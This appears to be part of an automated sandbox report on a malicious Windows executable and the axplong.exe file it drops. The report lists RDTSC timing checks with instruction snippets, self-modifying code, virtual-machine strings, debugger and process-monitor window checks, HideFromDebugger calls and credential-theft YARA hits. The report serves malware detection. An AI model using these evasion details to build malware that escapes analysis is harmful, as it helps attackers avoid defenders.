                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5140820 second address: 5140824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5140824 second address: 5140828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5140828 second address: 514082E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 514082E second address: 514083D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 514083D second address: 5140853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE5B8F4A74Bh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5140853 second address: 514086B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB64h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 514086B second address: 514086F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 514086F second address: 51408D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE5B8D9CB5Dh 0x00000010 add al, 00000066h 0x00000013 jmp 00007FE5B8D9CB61h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FE5B8D9CB60h 0x0000001f adc cx, 9808h 0x00000024 jmp 00007FE5B8D9CB5Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE5B8D9CB60h 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51408D5 second address: 51408DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51408DB second address: 51408E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51408E1 second address: 51408E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130913 second address: 5130919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130B98 second address: 5130B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130B9C second address: 5130BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130BA2 second address: 5130BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FE5B8F4A753h 0x00000016 sbb ecx, 68B30D8Eh 0x0000001c jmp 00007FE5B8F4A759h 0x00000021 popfd 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130CDB second address: 5130CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130CDF second address: 5130CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130CEE second address: 5130CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5130CF4 second address: 5130CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96A32C second address: 96A330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96A330 second address: 96A334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 885C73 second address: 885C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 87B7E4 second address: 87B7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 87B7EA second address: 87B80A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8D9CB62h 0x0000000d jc 00007FE5B8D9CB56h 0x00000013 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 87B80A second address: 87B80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 87B80E second address: 87B81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE5B8D9CB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 885045 second address: 885064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FE5B8F4A752h 0x0000000b js 00007FE5B8F4A746h 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 885064 second address: 885078 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE5B8D9CB5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 88537A second address: 88538A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 88538A second address: 885393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 885393 second address: 8853AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FE5B8F4A746h 0x00000014 jo 00007FE5B8F4A746h 0x0000001a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8853AD second address: 8853C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 88551C second address: 88553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE5B8F4A746h 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FE5B8F4A74Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 88553B second address: 88555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE5B8D9CB68h 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887978 second address: 887982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE5B8F4A746h 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887982 second address: 887986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887A07 second address: 887A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, eax 0x0000000a push 00000000h 0x0000000c mov edi, ebx 0x0000000e push 30A59EDFh 0x00000013 jmp 00007FE5B8F4A754h 0x00000018 xor dword ptr [esp], 30A59E5Fh 0x0000001f adc dx, 377Ah 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FE5B8F4A748h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FE5B8F4A748h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push 00000003h 0x0000005e mov di, 44B1h 0x00000062 push 8CDCC9A9h 0x00000067 pushad 0x00000068 jnp 00007FE5B8F4A748h 0x0000006e push eax 0x0000006f push edx 0x00000070 je 00007FE5B8F4A746h 0x00000076 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887A9F second address: 887AF2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 33233657h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FE5B8D9CB58h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D3603h], ecx 0x00000032 lea ebx, dword ptr [ebp+1244C89Fh] 0x00000038 mov si, 1805h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 jmp 00007FE5B8D9CB5Ah 0x00000045 pop ebx 0x00000046 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887C67 second address: 887C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887C83 second address: 887CAE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FE5B8D9CB5Fh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FE5B8D9CB56h 0x00000021 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 887CAE second address: 887CB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E06C6 second address: 50E06CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E06CC second address: 50E06DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E06DD second address: 50E0709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE5B8D9CB5Dh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0709 second address: 50E070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E070F second address: 50E0762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FE5B8D9CB64h 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FE5B8D9CB60h 0x00000016 sub esp, 1Ch 0x00000019 pushad 0x0000001a mov edx, esi 0x0000001c mov eax, 251A6549h 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FE5B8D9CB61h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0762 second address: 50E0767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0767 second address: 50E07AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE5B8D9CB69h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8D9CB5Dh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E07AC second address: 50E07DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8F4A758h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E07DE second address: 50E07E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E07E2 second address: 50E07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E07E8 second address: 50E080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE5B8D9CB5Bh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ebx, esi 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E080F second address: 50E084D instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, edi 0x00000009 jmp 00007FE5B8F4A754h 0x0000000e push eax 0x0000000f jmp 00007FE5B8F4A74Bh 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FE5B8F4A750h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E084D second address: 50E0851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0851 second address: 50E0857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0857 second address: 50E088B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FAB370h] 0x0000000e jmp 00007FE5B8D9CB60h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 pushad 0x00000017 popad 0x00000018 xor eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E088B second address: 50E0891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 7BEA73 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 95CDEC instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 95CADA instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 985B9D instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Special instruction interceptor: First address: 9EDF44 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 70EA73 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 8ACDEC instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 8ACADA instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 8D5B9D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 93DF44 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Code function: 0_2_05130B6A rdtsc 0_2_05130B6A
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 405
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7900 Thread sleep count: 38 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7900 Thread sleep time: -76038s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7860 Thread sleep count: 405 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7860 Thread sleep time: -12150000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7992 Thread sleep time: -360000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7884 Thread sleep count: 34 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7884 Thread sleep time: -68034s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7860 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
                    Source: axplong.exe, axplong.exe, 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
                    Source: EXyAlLKIck.exe, 00000000.00000002.2055040575.000000000093D000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2085188988.000000000088D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2085933555.000000000088D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Code function: 0_2_05130B6A rdtsc 0_2_05130B6A
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006D645B mov eax, dword ptr fs:[00000030h] 7_2_006D645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006DA1C2 mov eax, dword ptr fs:[00000030h] 7_2_006DA1C2
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: axplong.exe, axplong.exe, 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006BD312 cpuid 7_2_006BD312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006BCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_006BCB1A
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006A65B0 LookupAccountNameA, 7_2_006A65B0

                    Stealing of Sensitive Information

                    Source: Yara match File source: 7.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.EXyAlLKIck.exe.750000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 2.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000003.2014529476.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000002.2085097235.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000003.2045418136.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2054954455.0000000000751000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
